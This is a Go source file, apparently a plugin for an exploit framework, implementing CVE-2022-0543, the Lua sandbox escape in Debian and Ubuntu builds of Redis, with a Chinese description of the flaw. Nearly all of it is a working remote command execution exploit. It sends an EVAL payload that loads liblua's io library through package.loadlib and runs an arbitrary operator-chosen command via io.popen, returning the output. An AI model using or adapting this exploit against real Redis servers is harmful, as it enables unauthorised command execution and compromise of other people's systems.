CVE-2022-0543
package CVE_2022_0543
import (
"context"
"expgo/plugins/api/req"
"expgo/plugins/api/types"
"fmt"
"log"
"net"
"strconv"
"time"
)
var (
pluginType = "custom"
vulType = "rce"
name = "CVE-2022-0543"
component = "redis"
author = "akkuman"
description = "Redis Lua沙盒绕过命令执行(CVE-2022-0543)Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。"
references = []string{
"https://github.com/vulhub/vulhub/blob/master/redis/CVE-2022-0543/README.zh-cn.md",
}
tags = []string{
"redis",
"rce",
}
)
var opts = types.NewOptions()
func init() {
opts.String("target", true, "目标", "", func(i interface{}) bool {
target := i.(string)
_, err := net.ResolveTCPAddr("tcp", target)
return err == nil
})
opts.String("password", false, "redis密码(无密码代表无验证)", "")
opts.String("liblua_path", false, "liblua路径", "/usr/lib/x86_64-linux-gnu/liblua5.1.so.0")
opts.String("cmd", true, "执行命令", "id")
}
func exploit(ctx context.Context, params map[string]interface{}) types.PluginResult {
target := params["target"].(string)
libluaPath := params["liblua_path"].(string)
password := params["password"].(string)
cmd := params["cmd"].(string)
rc := req.NewRedisClient(target, password, 0)
defer rc.Close()
reqCtx, cancel := context.WithTimeout(ctx, 10*time.Second)
defer cancel()
payload := fmt.Sprintf(`local io_l = package.loadlib(%s, "luaopen_io"); local io = io_l(); local f = io.popen(%s, "r"); local res = f:read("*a"); f:close(); return res`, strconv.Quote(libluaPath), strconv.Quote(cmd))
resp := rc.Eval(reqCtx, payload, nil)
result, err := resp.Result()
if reqCtx.Err() != nil {
log.Println("redis主线程可能已经被占用或命令已经执行成功")
return types.HitPluginResult
}
if err != nil {
log.Println(err)
return types.MissPluginResult
}
log.Printf("命令执行结果: %v\n", result)
return types.PluginResult{
ExtendInfo: map[string]interface{}{
"data": result,
},
Success: true,
}
}